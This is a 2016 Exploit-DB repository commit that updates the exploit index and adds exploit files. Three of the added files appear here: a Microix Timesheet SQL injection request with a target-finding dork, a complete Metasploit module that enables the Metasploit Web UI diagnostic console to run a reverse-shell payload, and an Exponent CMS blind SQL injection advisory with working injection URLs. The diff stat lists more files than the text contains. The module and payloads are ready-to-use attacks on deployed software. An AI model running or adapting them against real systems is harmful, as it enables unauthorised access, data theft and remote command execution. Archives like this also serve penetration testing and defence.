From 12047d93f1888d99943e1a561c838c619dffcb0f Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 23 Sep 2016 05:05:20 +0000
Subject: [PATCH] DB: 2016-09-23

9 new exploits

Slackware Linux 3.5 - /etc/group Missing Privilege Escalation
Slackware Linux 3.5 - Missing /etc/group Privilege Escalation

Matrimonial Website Script 1.0.2 - SQL Injection

Metasploit Web UI - Diagnostic Console Command Execution

Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities

Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection

Exponent CMS 2.3.9 - Blind SQL Injection

JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal

AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation

Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)

phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion
phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion

Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution
Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution

Microix Timesheet Module - SQL Injection

Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities
Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities
---
 files.csv                          |  17 +-
 platforms/aspx/webapps/40407.txt   |  32 ++
 platforms/multiple/remote/40415.rb | 285 ++++++++++++++++
 platforms/php/webapps/40412.txt    |  91 ++++++
 platforms/php/webapps/40413.txt    |  76 +++++
 platforms/php/webapps/40414.txt    | 507 +++++++++++++++++++++++++++++
 platforms/php/webapps/40416.txt    |  48 +++
 platforms/windows/dos/40411.txt    | 236 ++++++++++++++
 platforms/windows/local/40409.txt  |  38 +++
 platforms/windows/local/40410.txt  |  42 +++
 10 files changed, 1368 insertions(+), 4 deletions(-)
 create mode 100755 platforms/aspx/webapps/40407.txt
 create mode 100755 platforms/multiple/remote/40415.rb
 create mode 100755 platforms/php/webapps/40412.txt
 create mode 100755 platforms/php/webapps/40413.txt
 create mode 100755 platforms/php/webapps/40414.txt
 create mode 100755 platforms/php/webapps/40416.txt
 create mode 100755 platforms/windows/dos/40411.txt
 create mode 100755 platforms/windows/local/40409.txt
 create mode 100755 platforms/windows/local/40410.txt

diff --git a/files.csv b/files.csv
index 4b2cca784..164e6f83f 100755
--- a/files.csv
+++ b/files.csv
@@ -16528,7 +16528,7 @@ id,file,description,date,author,platform,type,port
 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0
 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
-19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group Missing Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
+19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
@@ -18573,6 +18573,7 @@ id,file,description,date,author,platform,type,port
 21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0
 21283,platforms/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0
 21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0
+40416,platforms/php/webapps/40416.txt,"Matrimonial Website Script 1.0.2 - SQL Injection",2016-09-22,N4TuraL,php,webapps,80
 21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0
 21286,platforms/windows/remote/21286.c,"Apple QuickTime 5.0 - Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,windows,remote,0
 21287,platforms/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow",2002-02-11,"Jin Ho You",cgi,remote,0
@@ -18830,6 +18831,7 @@ id,file,description,date,author,platform,type,port
 21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0
 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0
+40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution",2016-09-22,Metasploit,multiple,remote,0
 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
 21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 - XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
@@ -19483,6 +19485,7 @@ id,file,description,date,author,platform,type,port
 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
 22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
 22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
+40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
@@ -19585,6 +19588,7 @@ id,file,description,date,author,platform,type,port
 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0
 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0
 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0
+40413,platforms/php/webapps/40413.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0
 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0
 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
@@ -19673,6 +19677,7 @@ id,file,description,date,author,platform,type,port
 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,multiple,remote,0
 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0
 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps,0
+40412,platforms/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",php,webapps,80
 22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - article.php SQL Injection",2003-03-22,frog,php,webapps,0
 22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection",2003-03-23,frog,php,webapps,0
 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0
@@ -19943,6 +19948,7 @@ id,file,description,date,author,platform,type,port
 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0
 22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0
 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0
+40411,platforms/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,windows,dos,0
 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0
 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0
 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",windows,dos,0
@@ -20008,6 +20014,7 @@ id,file,description,date,author,platform,type,port
 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0
 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0
 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0
+40410,platforms/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,windows,local,0
 22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0
 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure",2003-06-10,"Ziv Kamir",multiple,remote,0
 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0
@@ -20078,6 +20085,7 @@ id,file,description,date,author,platform,type,port
 22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0
 22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0
 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0
+40409,platforms/windows/local/40409.txt,"Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0
 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0
 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0
 22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps,0
@@ -25845,7 +25853,7 @@ id,file,description,date,author,platform,type,port
 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0
 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0
 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
-28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
+28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0
 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0
@@ -30556,7 +30564,7 @@ id,file,description,date,author,platform,type,port
 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0
 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
-33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
+33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
@@ -34761,6 +34769,7 @@ id,file,description,date,author,platform,type,port
 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0
 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
 38414,platforms/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0
+40407,platforms/aspx/webapps/40407.txt,"Microix Timesheet Module - SQL Injection",2016-09-22,"Anthony Cole",aspx,webapps,0
 38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0
 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0
 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0
@@ -35188,7 +35197,7 @@ id,file,description,date,author,platform,type,port
 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
 38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
-39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
+39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
diff --git a/platforms/aspx/webapps/40407.txt b/platforms/aspx/webapps/40407.txt
new file mode 100755
index 000000000..31aee97c9
--- /dev/null
+++ b/platforms/aspx/webapps/40407.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Microix timesheet module SQL Injection
+# Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
+# Date: 2016-09-06
+# Software Link: http://www.microix.net/workflow-modules/timesheet-module/
+# Exploit Author: Anthony Cole
+# Contact: http://twitter.com/acole76
+# Website: http://www.3fforensics.com/
+# CVE: 
+# Category: webapps
+ 
+1. Description
+   
+Microix timeclock is vulnerable to a SQL injection.  The field that is injectable is:
+
+ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID
+
+Initial contact attempt: 08/22/2016
+2nd attempt: 08/29/2016
+3rd attempt: 09/05/2016
+4th attempt: 09/21/2016
+   
+2. Proof of Concept
+
+POST /microixcloud/ HTTP/1.1
+Cache-Control: no-cache
+Content-Type: application/x-www-form-urlencoded
+
+__VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin
+
+ 
+3. Solution:
+None
\ No newline at end of file
diff --git a/platforms/multiple/remote/40415.rb b/platforms/multiple/remote/40415.rb
new file mode 100755
index 000000000..0345dfc54
--- /dev/null
+++ b/platforms/multiple/remote/40415.rb
@@ -0,0 +1,285 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Metasploit Web UI Diagnostic Console Command Execution',
+      'Description'   => %q{
+        This module exploits the "diagnostic console" feature in the Metasploit
+        Web UI to obtain a reverse shell.
+
+        The diagnostic console is able to be enabled or disabled by an
+        administrator on Metasploit Pro and by an authenticated user on
+        Metasploit Express and Metasploit Community. When enabled, the
+        diagnostic console provides access to msfconsole via the web interface.
+        An authenticated user can then use the console to execute shell
+        commands.
+
+        NOTE: Valid credentials are required for this module.
+
+        Tested against:
+
+        Metasploit Community 4.1.0,
+        Metasploit Community 4.8.2,
+        Metasploit Community 4.12.0
+      },
+      'Author'        => [ 'Justin Steven' ],    # @justinsteven
+      'License'       => MSF_LICENSE,
+      'Privileged'    => true,
+      'Arch'          => ARCH_CMD,
+      'Payload'       => { 'PayloadType'  => 'cmd' },
+      'Targets'       =>
+        [
+          [ 'Unix',
+            {
+              'Platform'   => [ 'unix' ]
+            }
+          ],
+          [ 'Windows',
+            {
+              'Platform'   => [ 'windows' ]
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate'  => 'Aug 23 2016'
+      ))
+
+    register_options(
+      [
+        OptBool.new('SSL', [ true, 'Use SSL', true ]),
+        OptPort.new('RPORT', [ true, '', 3790 ]),
+        OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]),
+        OptString.new('USERNAME', [ true,  'The user to authenticate as' ]),
+        OptString.new('PASSWORD', [ true,  'The password to authenticate with' ])
+      ], self.class)
+  end
+
+  def do_login()
+
+    print_status('Obtaining cookies and authenticity_token')
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'login'),
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'Failed to retrieve login page')
+    end
+
+    unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/
+      fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?")
+    end
+
+    authenticity_token = $1
+    session = res.get_cookies
+
+    print_status('Logging in')
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'user_sessions'),
+      'cookie'    => session,
+      'vars_post' =>
+        {
+          'utf8'                    => '\xE2\x9C\x93',
+          'authenticity_token'      => authenticity_token,
+          'user_session[username]'  => datastore['USERNAME'],
+          'user_session[password]'  => datastore['PASSWORD'],
+          'commit'                  => 'Sign in'
+        }
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'Failed to log in')
+    end
+
+    return res.get_cookies, authenticity_token
+
+  end
+
+  def get_console_status(session)
+
+    print_status('Getting diagnostic console status and profile_id')
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'settings'),
+      'cookie'    => session,
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')
+    end
+
+    unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/
+      fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')
+    end
+
+    profile_id = $1
+
+    if res.body =~ /<input\W+.*\b(id="allow_console_access"\W+.*\bchecked="checked"|checked="checked"\W+.*\bid="allow_console_access")/
+      console_status = true
+    elsif res.body =~ /<input\W+.*\bid="allow_console_access"/
+      console_status = false
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')
+    end
+
+    print_good("Console is currently: #{console_status ? 'Enabled' : 'Disabled'}")
+
+    return console_status, profile_id
+
+  end
+
+  def set_console_status(session, authenticity_token, profile_id, new_console_status)
+    print_status("#{new_console_status ? 'Enabling' : 'Disabling'} diagnostic console")
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'settings', 'update_profile'),
+      'cookie'    => session,
+      'vars_post' =>
+        {
+          'utf8'                    => '\xE2\x9C\x93',
+          '_method'                 => 'patch',
+          'authenticity_token'      => authenticity_token,
+          'profile_id'              => profile_id,
+          'allow_console_access'    => new_console_status,
+          'commit'                  => 'Update Settings'
+        }
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')
+    end
+
+  end
+
+  def get_container_id(session, container_label)
+
+    container_label_singular = container_label.gsub(/s$/, "")
+
+    print_status("Getting ID of a valid #{container_label_singular}")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, container_label),
+      'cookie'    => session,
+    })
+
+    unless res && res.body =~ /\bid="#{container_label_singular}_([^"]*)"/
+      print_warning("Failed to get a valid #{container_label_singular} ID")
+      return
+    end
+
+    container_id = $1
+
+    vprint_good("Got: #{container_id}")
+
+    container_id
+
+  end
+
+  def get_console(session, container_label, container_id)
+
+    print_status('Creating a console, getting its ID and authenticity_token')
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'console'),
+      'cookie'    => session,
+    })
+
+    unless res && res.headers['location']
+      fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')
+    end
+
+    console_id = res.headers['location'].split('/')[-1]
+
+    vprint_good("Got console ID: #{console_id}")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
+      'cookie'    => session,
+    })
+
+    unless res && res.body =~ /console_init\('console', 'console', '([^']*)'/
+      fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')
+    end
+
+    console_authenticity_token = $1
+
+    return console_id, console_authenticity_token
+
+  end
+
+  def run_command(session, container_label, console_authenticity_token, container_id, console_id, command)
+
+    print_status('Running payload')
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
+      'cookie'    => session,
+      'vars_post' =>
+        {
+          'read'                    => 'yes',
+          'cmd'                     => command,
+          'authenticity_token'      => console_authenticity_token,
+          'last_event'              => '0',
+          '_'                       => ''
+        }
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'Failed to run command')
+    end
+
+  end
+
+  def exploit
+
+    session, authenticity_token = do_login()
+
+    original_console_status, profile_id = get_console_status(session)
+
+    unless original_console_status
+      set_console_status(session, authenticity_token, profile_id, true)
+    end
+
+    if container_id = get_container_id(session, "workspaces")
+      # target calls them "workspaces"
+      container_label = "workspaces"
+    elsif container_id = get_container_id(session, "projects")
+      # target calls them "projects"
+      container_label = "projects"
+    else
+      fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')
+    end
+
+    console_id, console_authenticity_token = get_console(session, container_label,container_id)
+
+    run_command(session, container_label, console_authenticity_token,
+                container_id, console_id, payload.encoded)
+
+    unless original_console_status
+      set_console_status(session, authenticity_token, profile_id, false)
+    end
+
+    handler
+
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/40412.txt b/platforms/php/webapps/40412.txt
new file mode 100755
index 000000000..377f8984a
--- /dev/null
+++ b/platforms/php/webapps/40412.txt
@@ -0,0 +1,91 @@
+=============================================
+MGC ALERT 2016-005
+- Original release date: September 09, 2016
+- Last revised:  September 20, 2016
+- Discovered by: Manuel GarcAa CA!rdenas
+- Severity: 7,1/10 (CVSS Base Score)
+- CVE-ID: CVE-2016-7400
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Blind SQL Injection in Exponent CMS <= v2.3.9
+
+II. BACKGROUND
+-------------------------
+Exponent CMS is a free, open source, open standards modular enterprise
+software framework and content management system (CMS) written in the
+programming language PHP.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal in the index.php page.
+
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+It is possible to inject SQL code in the "index.php" page
+"/exponent/index.php".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL have been confirmed to all suffer from Blind SQL
+injection and Time Based SQL Injection.
+
+Blind SQL Injection POC:
+
+/exponent/index.php'%20or%201%3d1--%20
+
+/exponent/index.php'%20or%201%3d2--%20
+
+Time Based SQL Injection POC:
+
+/exponent/index.php'%20OR%20SLEEP(1)--%20   (2 seconds of response)
+
+/exponent/index.php'%20OR%20SLEEP(30)--%20   (30 seconds of response)
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Exponent CMS <= v2.3.9
+
+VII. SOLUTION
+-------------------------
+Vendor fix the vulnerability:
+http://www.exponentcms.org/news/updated-patches-released-for-v2-1-4-and-v2-2-3-1473726129-0.50310400
+
+VIII. REFERENCES
+-------------------------
+http://www.exponentcms.org/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+September 09, 2016 1: Initial release
+September 20, 2016 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+September 09, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
+September 09, 2016 2: Send to vendor
+September 12, 2016 3: Vendor fix vulnerability
+September 20, 2016 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
